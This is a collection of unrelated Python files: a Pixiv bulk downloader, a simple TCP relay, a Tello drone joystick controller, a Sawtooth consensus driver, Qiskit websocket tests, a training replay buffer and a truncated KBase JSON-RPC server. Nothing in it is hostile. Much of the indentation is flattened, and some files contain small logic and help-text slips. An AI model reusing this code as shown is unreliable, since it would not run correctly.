| source | python |
|---|---|
app.py
|
from urllib import request
import threading
import queue
import re
import os
import webbrowser
import sys
import subprocess
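# Bulk Pixiv downloader: collects illustration IDs either from a user's
# profile (when a numeric user ID is given) or from a ranking page URL,
# resolves each ID to its "url_big" originals via the touch/ajax endpoint,
# and downloads them concurrently into the local ./res folder.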
class pixiv:
def __init__(self):
self.folder = 'res'
self.web_coding = 'utf-8'
self.root = os.path.dirname(os.path.abspath(__file__))
self.DefaultHeader = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
"Accept": "*/*",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Accept-Encoding": "",
"Connection": "keep-alive",
}
self.data_low = []
self.num = 0
def _http(self, url, headers, Obj=False):
mok = request.urlopen
res = mok(request.Request(url, headers=headers, method='GET'))
if Obj:
return res
return res.read().decode(self.web_coding, "ignore")
def data_image(self, url_id):
_header = self.DefaultHeader.copy()
_header["Referer"] = "https://www.pixiv.net/member_illust.php?mode=medium&illust_id={}".format(url_id)
_url_data = "https://www.pixiv.net/touch/ajax/illust/details?illust_id={}".format(url_id)
_data_details = self._http(_url_data, _header)
data_url = self.sort_data(re.findall('"url_big":"[^"]*"', _data_details))
        data_uid = re.findall('"user_id":"[^"]*"', _data_details)[0].split(':', 1)[-1].strip('"')
return data_url, _header, data_uid
def sort_data(self, data):
_data = []
for item in data:
if item not in _data:
_data.append(item)
        return [item.replace('\\', '').split(':', 1)[-1].strip('"') for item in _data]
def get_item(self, UserID=None):
if not UserID:
UserID = 'https://www.pixiv.net/ranking.php?mode=male'
if '://' in str(UserID):
Mode_ID = False
else:
Mode_ID = True
if Mode_ID:
_url = "https://www.pixiv.net/ajax/user/{}/profile/all".format(str(UserID))
page = self._http(_url, self.DefaultHeader, True)
if page.code != 200:
raise Exception("Pixiv Page:", page.code)
_data = re.findall('"[0-9]+":null', page.read().decode(self.web_coding, "ignore"))
            self.data_low = [item.split(":")[0].strip('"') for item in _data if ':null' in item]
else:
page = self._http(UserID, self.DefaultHeader, True)
if page.code != 200:
raise Exception("Pixiv Page:", page.code)
_data = re.findall('data-src="[^"]*"', page.read().decode(self.web_coding, "ignore"))
            self.data_low = [item.split("=", 1)[-1].strip('"').rsplit('/', 1)[-1].split('_')[0] for item in _data if '/img-master/img/' in item]
        self.filter_item()
    def filter_item(self):
folder = os.path.join(self.root, self.folder)
if not os.path.exists(folder):
return None
_split = "_"
        _exist = {item.split(_split)[1] for item in os.listdir(folder) if _split in item}
print("Exist Item:", len(_exist))
for _item in self.data_low.copy():
if _item in _exist:
self.data_low.remove(_item)
def get_data_by_item(self, item):
data = self.data_image(item)
for data_url in data[0]:
image = self._http(data_url, data[1], True)
if image.code != 200:
raise Exception("200: [{} | {}]".format(image.code, data[0]))
            self.write("{}_{}".format(data[2], data_url.rsplit('/', 1)[-1]), image.read())
def get_data(self, data_list=None):
if not data_list:
data_list = self.data_low
for item in data_list:
self.get_data_by_item(item)
print("\nTotal Image: ", self.num)
def write(self, name, data):
folder = os.path.join(self.root, self.folder)
if not os.path.exists(folder):
os.mkdir(folder)
file = os.path.join(folder, str(name))
        with open(file, 'wb') as fp:
            fp.write(data)
self.num += 1
print("200: [ OK | {} ]".format(file))
def add_queue(self, _queue, data_list=None):
for item in data_list:
_item = str(item).strip()
if item and _item:
_queue.put(_item)
def multi_data(self, data_list=None, jumlah=25):
if not data_list:
data_list = self.data_low
print("New Item:", len(data_list), '/', sys.argv[1])
# print(sys.argv[1])
_threads = []
_queue = queue.Queue(maxsize=jumlah)
task_main = threading.Thread(target=self.add_queue, args=(_queue, data_list))
        task_main.name = "TaskMain"
        task_main.daemon = True
task_main.start()
while _queue.qsize() > 0:
if len(_threads) >= jumlah:
for _item in _threads.copy():
if not _item.is_alive():
_threads.remove(_item)
continue
item = _queue.get()
task = threading.Thread(target=self.get_data_by_item, args=(item,))
            task.daemon = True
task.start()
_threads.append(task)
for _task in _threads:
_task.join()
print("\nTotal Image: ", self.num)
if len(sys.argv) == 2:
    imgdir = sys.argv[1]
else:
    print(f'usage: {sys.argv[0]} [illust_id]')
    sys.exit(2)
if __name__ == '__main__':
try:
        task = sys.argv[1]
    except IndexError:
        task = None
p = pixiv()
p.get_item(task)
p.multi_data(jumlah=25)
subprocess.call('python galer.py', shell=True) # nosec
print("local viewer saved > gallery.html")
# title=os.getcwd()
    # webbrowser.open_new_tab(title + "/gallery.html")
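    # Usage sketch (the argument value below is only an example):
    #   python app.py 123456        # 123456 = a Pixiv user ID
    # Downloaded files land in ./res as <user_id>_<original_filename>; galer.py
    # (a companion script, not shown here) is then invoked to build gallery.html.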
|
proxy_server.py
|
#!/usr/bin/env python
import socket
import multiprocessing
HOST = ""
PORT = 8001
BUFFER_SIZE = 1024
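# Minimal TCP relay: each accepted client connection is handed to its own
# process, which shuttles bytes to and from www.google.com:80. This is a toy
# forwarder, not a general HTTP proxy (no CONNECT handling, no duplex relay).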
def handle_conn(conn, addr):
print("Connected by", addr)
with socket.create_connection(("www.google.com", 80)) as goog:
while True:
data = conn.recv(BUFFER_SIZE)
if not data:
break
            goog.sendall(data)
while True:
data = goog.recv(BUFFER_SIZE)
if not data:
break
                conn.sendall(data)
conn.close()
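# Note: the accept loop below runs at import time. On platforms where
# multiprocessing spawns rather than forks (e.g. Windows), it should be
# wrapped in an `if __name__ == "__main__":` guard to avoid re-executing it
# in child processes.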
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
while True:
conn, addr = s.accept()
p = multiprocessing.Process(target=handle_conn, args=(conn, addr))
p.daemon = True
p.start()
print(p)
|
joy.py
|
"""
Copyright 2020 Aircomm
SPDX-License-Identifier: MIT
Author: Giovanni Grieco <giovanni@grieco.dev>
"""
import collections
import time
import os
from threading import Thread
from scapy import sendrecv
from scapy.layers.inet import IP, UDP
from scapy.packet import Raw
"""
Importing SDL2 in Windows could lead to an ImportError if DLL is not found.
Let's force it to search in the current directory.
"""
if os.name == 'nt':
os.environ['PYSDL2_DLL_PATH'] = os.curdir
import sdl2
import sdl2.ext
class JoystickController:
"""
Control your DJI Tello drone using your Joystick, directly from your PC.
    Be sure that networking is already set up and the drone is reachable.
"""
def __init__(self):
"""
        Initialize useful constants and the button/axis mapping that drives controller actions.
"""
self._running = True
self._command_queue = collections.deque()
###
# You may want to customize the constants and button mapping below
# to suit your specific needs and Joystick characteristics.
###
self._joystick = self._init_joystick()
self._AXIS_DEAD = 2500
self._AXIS_MAX_VAL = 32767
self._axis_state = {
'roll': 0,
'quota': 0,
'yaw': 0,
'pitch': 0
}
self._event_map = {
'SELECT': self._land,
'START': self._takeoff,
'A': self._emergency_land,
'Y': self._command,
'LEFT_X': self._set_roll,
'LEFT_Y': self._set_pitch,
'RIGHT_X': self._set_yaw,
'RIGHT_Y': self._set_quota
}
self._button_map = ('A', 'B', 'X', 'Y', 'LB', 'RB', 'SELECT', 'START', 'JL', 'JR')
self._axis_map = ('LEFT_X', 'LEFT_Y', 'LT', 'RIGHT_X', 'RIGHT_Y', 'RT')
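        # The index-to-name tables above appear to assume an Xbox-style layout;
        # other controllers may enumerate buttons and axes differently, so
        # adjust the tuples if your mappings do not line up.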
print(f'Connected to {sdl2.SDL_JoystickName(self._joystick).decode()}')
def run(self):
"""
Main runtime procedure.
        Manage worker threads, an idle main loop, and the shutdown procedure on program termination.
"""
threads = (
Thread(target=self._receive_command_loop, daemon=True),
Thread(target=self._send_command_loop, daemon=False),
)
for t in threads:
t.start()
self._run_loop()
# if we exit from the run loop for some reason, shutdown
self._command_queue.clear()
self._land()
for t in threads:
t.join()
@staticmethod
def _init_joystick():
"""
        Initialize the joystick using the SDL library. Note that the first
        enumerated joystick is chosen automatically.
Returns
-------
The SDL Joystick object.
"""
sdl2.SDL_Init(sdl2.SDL_INIT_JOYSTICK)
njoysticks = sdl2.SDL_NumJoysticks()
if njoysticks < 1:
            raise RuntimeError('No joysticks connected!')
print('Joysticks available:')
for i in range(njoysticks):
joy = sdl2.SDL_JoystickOpen(i)
print(f' - {sdl2.SDL_JoystickName(joy).decode()}')
return sdl2.SDL_JoystickOpen(0)
def _run_loop(self):
"""
Main running loop, just to check and handle interrupt signal.
"""
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
self._running = False
def _receive_command_loop(self):
"""
Manage Joystick events and call their mapped function.
"""
while self._running:
for event in sdl2.ext.get_events():
try:
if event.type == sdl2.SDL_JOYBUTTONDOWN:
self._event_map[self._button_map[event.jbutton.button]]()
elif event.type == sdl2.SDL_JOYAXISMOTION:
if abs(event.jaxis.value) > self._AXIS_DEAD:
self._event_map[self._axis_map[event.jaxis.axis]](event.jaxis.value)
except KeyError:
pass
def _send_command_loop(self):
"""
        Handle command execution using a simple FCFS scheduling policy.
"""
while self._running:
try:
                cmd = self._command_queue.popleft()  # FCFS: consume the oldest queued command
answer = sendrecv.sr1(IP(dst='192.168.10.1') / UDP(dport=8889) / cmd,
verbose=1,
timeout=0.2)
try:
response = answer[Raw].load.decode()
print(f'EXE {cmd}: {response}')
except TypeError:
print(f'EXE {cmd}: unknown')
continue
except IndexError: # nothing to schedule, retry another time
time.sleep(0.5)
continue
def _command(self):
"""
Take control of the DJI Tello.
"""
print('Pressed Command button')
self._command_queue.append('command')
def _land(self, force=False):
"""
Schedule drone landing.
Parameters
----------
force: clear out FCFS queue, in case of absolute necessity.
"""
print('Pressed Land button')
if force:
self._command_queue.clear()
self._command_queue.append('land')
def _emergency_land(self):
"""
Schedule drone emergency landing.
Caution: don't harm the drone!
"""
self._command_queue.clear()
self._command_queue.append('emergency')
def _takeoff(self):
"""
Schedule drone takeoff.
Note: if drone is not taking off, check your battery charge level!
"""
print('Pressed Takeoff button')
self._command_queue.append('takeoff')
def _set_roll(self, raw_val):
"""
Set roll axis value.
"""
val = int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['roll'] != val:
self._axis_state['roll'] = val
self._dispatch_axis_update()
def _set_quota(self, raw_val):
"""
Set quota axis value.
"""
val = -int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['quota'] != val:
self._axis_state['quota'] = val
self._dispatch_axis_update()
def _set_yaw(self, raw_val):
"""
Set yaw axis value.
"""
val = int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['yaw'] != val:
self._axis_state['yaw'] = val
self._dispatch_axis_update()
def _set_pitch(self, raw_val):
"""
Set pitch axis value.
"""
val = -int(raw_val * 100 / self._AXIS_MAX_VAL)
if self._axis_state['pitch'] != val:
self._axis_state['pitch'] = val
self._dispatch_axis_update()
def _dispatch_axis_update(self):
"""
        Schedule an update of the pitch-roll-quota-yaw of the drone, typically
        managed using the Joystick analog sticks.
"""
# print(f'RC: {self._axis_state}') # Caution: this message is highly frequent
self._command_queue.append(f'rc {self._axis_state["roll"]} '
f'{self._axis_state["pitch"]} '
f'{self._axis_state["quota"]} '
f'{self._axis_state["yaw"]}')
if __name__ == '__main__':
    print('This is Joy - Copyright 2020 Aircomm')
ctrl = JoystickController()
ctrl.run()
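    # Usage sketch: join the Tello's Wi-Fi network first (the drone is addressed
    # at the hard-coded 192.168.10.1:8889 above), then run `python joy.py`.
    # Per the mapping in __init__: Y sends 'command' (enter SDK mode), START
    # takes off, SELECT lands, and A queues the 'emergency' command.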
|
zmq_driver.py
|
# Copyright 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
import concurrent.futures
import logging
from queue import Queue
from threading import Thread
from sawtooth_sdk.consensus.driver import Driver
from sawtooth_sdk.consensus.engine import StartupState
from sawtooth_sdk.consensus.engine import PeerMessage
from sawtooth_sdk.consensus.zmq_service import ZmqService
from sawtooth_sdk.consensus import exceptions
from sawtooth_sdk.messaging.stream import Stream
from sawtooth_sdk.protobuf import consensus_pb2
from sawtooth_sdk.protobuf.validator_pb2 import Message
LOGGER = logging.getLogger(__name__)
REGISTER_TIMEOUT = 300
SERVICE_TIMEOUT = 300
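# The driver sits between a consensus engine and the validator: it registers
# the engine over ZMQ, translates validator notifications into updates pushed
# onto the engine's queue, and acknowledges every notification it consumes.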
class ZmqDriver(Driver):
def __init__(self, engine):
super().__init__(engine)
self._engine = engine
self._stream = None
self._exit = False
self._updates = None
def start(self, endpoint):
self._stream = Stream(endpoint)
startup_state = self._register()
# Validators version 1.1 send startup info with the registration
# response; newer versions will send an activation message with the
# startup info
if startup_state is None:
startup_state = self._wait_until_active()
self._updates = Queue()
driver_thread = Thread(
target=self._driver_loop)
driver_thread.start()
try:
self._engine.start(
self._updates,
ZmqService(
stream=self._stream,
timeout=SERVICE_TIMEOUT),
startup_state)
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught engine exception")
self.stop()
driver_thread.join()
def _driver_loop(self):
try:
future = self._stream.receive()
while True:
if self._exit:
self._engine.stop()
break
try:
message = future.result(1)
future = self._stream.receive()
except concurrent.futures.TimeoutError:
continue
try:
result = self._process(message)
# if message was a ping ignore
if result[0] == Message.PING_REQUEST:
continue
self._updates.put(result)
except exceptions.ReceiveError as err:
LOGGER.warning("%s", err)
continue
except Exception: # pylint: disable=broad-except
LOGGER.exception("Uncaught driver exception")
def stop(self):
self._exit = True
self._engine.stop()
self._stream.close()
def _register(self):
self._stream.wait_for_ready()
request = consensus_pb2.ConsensusRegisterRequest(
name=self._engine.name(),
version=self._engine.version(),
)
for (name, version) in self._engine.additional_protocols():
protocol = request.additional_protocols.add()
protocol.name = name
protocol.version = version
while True:
future = self._stream.send(
message_type=Message.CONSENSUS_REGISTER_REQUEST,
content=request.SerializeToString())
response = consensus_pb2.ConsensusRegisterResponse()
response.ParseFromString(future.result(REGISTER_TIMEOUT).content)
if (
response.status
== consensus_pb2.ConsensusRegisterResponse.NOT_READY
):
continue
if response.status == consensus_pb2.ConsensusRegisterResponse.OK:
if (
response.HasField('chain_head')
and response.HasField('local_peer_info')
):
return StartupState(
response.chain_head,
response.peers,
response.local_peer_info)
return None
raise exceptions.ReceiveError(
'Registration failed with status {}'.format(response.status))
def _wait_until_active(self):
future = self._stream.receive()
while True:
try:
message = future.result(1)
except concurrent.futures.TimeoutError:
continue
if (
message.message_type
== Message.CONSENSUS_NOTIFY_ENGINE_ACTIVATED
):
notification = \
consensus_pb2.ConsensusNotifyEngineActivated()
notification.ParseFromString(message.content)
startup_state = StartupState(
notification.chain_head,
notification.peers,
notification.local_peer_info)
LOGGER.info(
'Received activation message with startup state: %s',
startup_state)
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck()
.SerializeToString())
return startup_state
LOGGER.warning('Received message type %s while waiting for \
activation message', message.message_type)
future = self._stream.receive()
def _process(self, message):
type_tag = message.message_type
if type_tag == Message.CONSENSUS_NOTIFY_PEER_CONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerConnected()
notification.ParseFromString(message.content)
data = notification.peer_info
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_DISCONNECTED:
notification = consensus_pb2.ConsensusNotifyPeerDisconnected()
notification.ParseFromString(message.content)
data = notification.peer_id
elif type_tag == Message.CONSENSUS_NOTIFY_PEER_MESSAGE:
notification = consensus_pb2.ConsensusNotifyPeerMessage()
notification.ParseFromString(message.content)
header = consensus_pb2.ConsensusPeerMessageHeader()
header.ParseFromString(notification.message.header)
peer_message = PeerMessage(
header=header,
header_bytes=notification.message.header,
header_signature=notification.message.header_signature,
content=notification.message.content)
data = peer_message, notification.sender_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_NEW:
notification = consensus_pb2.ConsensusNotifyBlockNew()
notification.ParseFromString(message.content)
data = notification.block
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_VALID:
notification = consensus_pb2.ConsensusNotifyBlockValid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_INVALID:
notification = consensus_pb2.ConsensusNotifyBlockInvalid()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_BLOCK_COMMIT:
notification = consensus_pb2.ConsensusNotifyBlockCommit()
notification.ParseFromString(message.content)
data = notification.block_id
elif type_tag == Message.CONSENSUS_NOTIFY_ENGINE_DEACTIVATED:
self.stop()
data = None
elif type_tag == Message.PING_REQUEST:
data = None
else:
raise exceptions.ReceiveError(
'Received unexpected message type: {}'.format(type_tag))
self._stream.send_back(
message_type=Message.CONSENSUS_NOTIFY_ACK,
correlation_id=message.correlation_id,
content=consensus_pb2.ConsensusNotifyAck().SerializeToString())
return type_tag, data
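# Wiring sketch (MyEngine is a hypothetical Engine implementation; the endpoint
# is whatever the validator exposes for consensus, e.g. tcp://localhost:5050):
#   driver = ZmqDriver(MyEngine())
#   driver.start(endpoint='tcp://localhost:5050')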
|
test_websocket_integration.py
|
# -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2018, 2019.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Test for the Websocket client integration."""
from unittest import mock
from threading import Thread
from queue import Queue
from qiskit import ClassicalRegister, QuantumCircuit, QuantumRegister
from qiskit.compiler import assemble, transpile
from qiskit.providers import JobTimeoutError
from qiskit.providers.ibmq import least_busy
from qiskit.providers.ibmq.api.clients.websocket import (
WebsocketClient, WebsocketAuthenticationMessage)
from qiskit.providers.ibmq.api.clients import AccountClient
from qiskit.providers.ibmq.ibmqfactory import IBMQFactory
from qiskit.providers.jobstatus import JobStatus
from ...ibmqtestcase import IBMQTestCase
from ...decorators import requires_qe_access, run_on_staging
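# These tests exercise the websocket status-streaming path of the IBM Q
# provider: they disable the HTTP polling fallback and, in several cases,
# deliberately break the websocket URL, authentication or job ID to confirm
# that the client falls back to HTTP retries and still reaches a final state.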
class TestWebsocketIntegration(IBMQTestCase):
"""Websocket integration tests."""
@classmethod
@requires_qe_access
def _get_provider(cls, qe_token=None, qe_url=None):
"""Helper for getting account credentials."""
ibmq_factory = IBMQFactory()
provider = ibmq_factory.enable_account(qe_token, qe_url)
return provider
def setUp(self):
self.provider = self._get_provider()
self.sim_backend = self.provider.get_backend(simulator=True)
# Create a circuit
qr = QuantumRegister(1)
cr = ClassicalRegister(1)
self.qc1 = QuantumCircuit(qr, cr, name='qc1')
self.qc1.measure(qr[0], cr[0])
# Create a default Qobj using the simulator.
self.circuit = transpile(self.qc1, backend=self.sim_backend)
self.qobj = assemble(self.circuit, backend=self.sim_backend, shots=1)
def test_websockets_simulator(self):
"""Test checking status of a job via websockets for a simulator."""
job = self.sim_backend.run(self.qobj)
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
result = job.result()
self.assertEqual(result.status, 'COMPLETED')
@run_on_staging
def test_websockets_device(self, provider):
"""Test checking status of a job via websockets for a device."""
backend = least_busy(provider.backends(simulator=False))
qc = transpile(self.qc1, backend=backend)
qobj = assemble(qc, backend=backend)
job = backend.run(qobj)
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
result = job.result()
self.assertTrue(result.success)
def test_websockets_job_final_state(self):
"""Test checking status of a job in a final state via websockets."""
job = self.sim_backend.run(self.qobj)
job._wait_for_completion()
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
# Pretend we haven't seen the final status
job._status = JobStatus.RUNNING
job._wait_for_completion()
self.assertIs(job._status, JobStatus.DONE)
def test_websockets_retry_bad_url(self):
"""Test http retry after websocket error due to an invalid URL."""
job = self.sim_backend.run(self.qobj)
saved_websocket_url = job._api.client_ws.websocket_url
try:
# Use fake websocket address.
job._api.client_ws.websocket_url = 'wss://wss.localhost'
# _wait_for_completion() should retry with http successfully
# after getting websockets error.
job._wait_for_completion()
finally:
job._api.client_ws.websocket_url = saved_websocket_url
self.assertIs(job._status, JobStatus.DONE)
@mock.patch.object(WebsocketClient, '_authentication_message',
return_value=WebsocketAuthenticationMessage(
type_='authentication', data='phantom_token'))
def test_websockets_retry_bad_auth(self, _):
"""Test http retry after websocket error due to a failed authentication."""
job = self.sim_backend.run(self.qobj)
with mock.patch.object(AccountClient, 'job_status',
side_effect=job._api.job_status) as mocked_wait:
job._wait_for_completion()
self.assertIs(job._status, JobStatus.DONE)
mocked_wait.assert_called_with(job.job_id())
def test_websockets_retry_connection_closed(self):
"""Test http retry after websocket error due to closed connection."""
def _job_status_side_effect(*args, **kwargs):
"""Side effect function to restore job ID"""
# pylint: disable=unused-argument
job._job_id = saved_job_id
return saved_job_status(saved_job_id)
job = self.sim_backend.run(self.qobj)
# Save the originals.
saved_job_id = job._job_id
saved_job_status = job._api.job_status
# Use bad job ID to fail the status retrieval.
job._job_id = '12345'
# job.result() should retry with http successfully after getting websockets error.
with mock.patch.object(AccountClient, 'job_status',
side_effect=_job_status_side_effect):
job._wait_for_completion()
self.assertIs(job._status, JobStatus.DONE)
def test_websockets_timeout(self):
"""Test timeout checking status of a job via websockets."""
qc = transpile(self.qc1, backend=self.sim_backend)
qobj = assemble(qc, backend=self.sim_backend, shots=2048)
job = self.sim_backend.run(qobj)
with self.assertRaises(JobTimeoutError):
job.result(timeout=0.1)
def test_websockets_multi_job(self):
"""Test checking status of multiple jobs in parallel via websockets."""
def _run_job_get_result(q):
job = self.sim_backend.run(self.qobj)
# Manually disable the non-websocket polling.
job._api._job_final_status_polling = None
job._wait_for_completion()
if job._status is not JobStatus.DONE:
q.put(False)
max_threads = 2
result_q = Queue()
job_threads = []
for i in range(max_threads):
job_thread = Thread(target=_run_job_get_result, args=(result_q,),
name="job_result_{}".format(i), daemon=True)
job_thread.start()
job_threads.append(job_thread)
for job_thread in job_threads:
job_thread.join()
self.assertTrue(result_q.empty())
|
detectortrainingdatabuffer.py
|
import argparse
import logging
from tempfile import TemporaryDirectory
from threading import Thread
import msgpack
import zmq
from dpu_utils.utils import RichPath, run_and_debug
from buglab.utils.logging import MetricProvider, configure_logging
from buglab.utils.msgpackutils import load_all_msgpack_l_gz
from buglab.utils.replaybuffer import ReplayBuffer
LOGGER = logging.getLogger(__name__)
metric_provider = MetricProvider("DetectorTrainingDataBuffer")
def hydrate_replay_buffer(replay_buffer, path):
for sample in load_all_msgpack_l_gz(
RichPath.create(path),
shuffle=True,
):
replay_buffer.add(sample)
def connect_buffer_to_publisher(replay_buffer: ReplayBuffer, pipeline_address: str):
context = zmq.Context.instance()
subscriber = context.socket(zmq.SUB)
subscriber.connect(pipeline_address)
subscriber.setsockopt_string(zmq.SUBSCRIBE, "")
message_counter = metric_provider.new_counter("incoming_messages")
graph_counter = metric_provider.new_counter("incoming_graphs")
delay_measure = metric_provider.new_latency_measure("incoming_latency")
while True:
with delay_measure:
msg = msgpack.loads(subscriber.recv())
message_counter.inc()
for graph_data, bug_prob in msg["rewrites"].values():
if graph_data is not None:
replay_buffer.add(graph_data)
graph_counter.inc()
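# run() below wires three pieces together: a thread that hydrates the buffer
# from msgpack.l.gz files on disk, a thread that keeps it topped up from the
# ZMQ publisher, and a REP socket that hands out one sample per request.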
def run(arguments):
LOGGER.info("Run args: %s", arguments)
# Create the replay buffer and hydrate it with initial data
tmp = TemporaryDirectory()
replay_gauge = metric_provider.new_gauge("replay_buffer_incoming_queue")
replay_buffer = ReplayBuffer(backing_dir=tmp.name, gauge=replay_gauge, ttl=arguments.sample_ttl)
hydration_thread = Thread(
        target=lambda: hydrate_replay_buffer(replay_buffer, arguments.initial_data_hydration_path),
name="replay_buffer_hydration_thread",
daemon=True,
)
hydration_thread.start()
# Create a thread that subscribes to the data generating pipeline and updates itself
buffer_subscription_thread = Thread(
target=lambda: connect_buffer_to_publisher(replay_buffer, arguments.data_pipeline_address),
name="data_pipeline_to_replay_buffer_thread",
daemon=True,
)
buffer_subscription_thread.start()
context = zmq.Context.instance()
socket = context.socket(zmq.REP)
socket.bind(f"tcp://*:{arguments.out_port}")
while True:
next_element = msgpack.dumps(next(replay_buffer.iter_batch(1)))
_ = socket.recv()
socket.send(next_element)
if __name__ == "__main__":
configure_logging()
parser = argparse.ArgumentParser(
description="Subscribe to a data generating pipeline and create a replay-like buffer for training."
)
parser.add_argument(
"initial_data_hydration_path",
type=str,
help="The path to hydrate the replay buffer upon startup.",
)
parser.add_argument(
"--data-pipeline-address",
type=str,
default="tcp://localhost:5558",
help="The zmq address to the data pipeline.",
)
parser.add_argument(
"--out-port",
type=int,
default=5560,
help="The address to the prometheus server.",
)
parser.add_argument(
"--sample-ttl",
type=int,
default=4,
help="The number of times to show each sample to the trainer.",
)
parser.add_argument(
"--debug",
action="store_true",
help="Debug on exception.",
)
parser.add_argument(
"--prometheus-server-port",
type=int,
default=8003,
help="The address to the prometheus server.",
)
parser.add_argument(
"--enable-tracing",
action="store_true",
help="Set to enable recording tracing information.",
)
args = parser.parse_args()
metric_provider.start_server(args.prometheus_server_port)
metric_provider.set_tracing(args.enable_tracing)
run_and_debug(lambda: run(args), args.debug)
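    # Example invocation (sketch; the hydration path is a placeholder):
    #   python detectortrainingdatabuffer.py /data/initial_samples \
    #       --data-pipeline-address tcp://localhost:5558 --out-port 5560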
|
Coverage_DiscrepancyServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import datetime
import json
import os
import random as _random
import sys
import traceback
from getopt import getopt, GetoptError
from multiprocessing import Process
from os import environ
from wsgiref.simple_server import make_server
import requests as _requests
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from biokbase import log
from Coverage_Discrepancy.authclient import KBaseAuth as _KBaseAuth
try:
from ConfigParser import ConfigParser
except ImportError:
from configparser import ConfigParser
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
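# This module is the WSGI entry point for the Coverage_Discrepancy service:
# it dispatches JSON-RPC calls to the implementation class, enforces per-method
# token authentication, records logging/provenance context, and can run under
# uwsgi, the wsgiref test server, or as a one-shot async CLI job.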
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Coverage_Discrepancy'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Coverage_Discrepancy.Coverage_DiscrepancyImpl import Coverage_Discrepancy # noqa @IgnorePep8
impl_Coverage_Discrepancy = Coverage_Discrepancy(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if len(e.args) == 1:
newerr.data = repr(e.args[0])
else:
newerr.data = repr(e.args)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if 'types' in self.method_data[request['method']]:
self._validate_params_types(request['method'], request['params'])
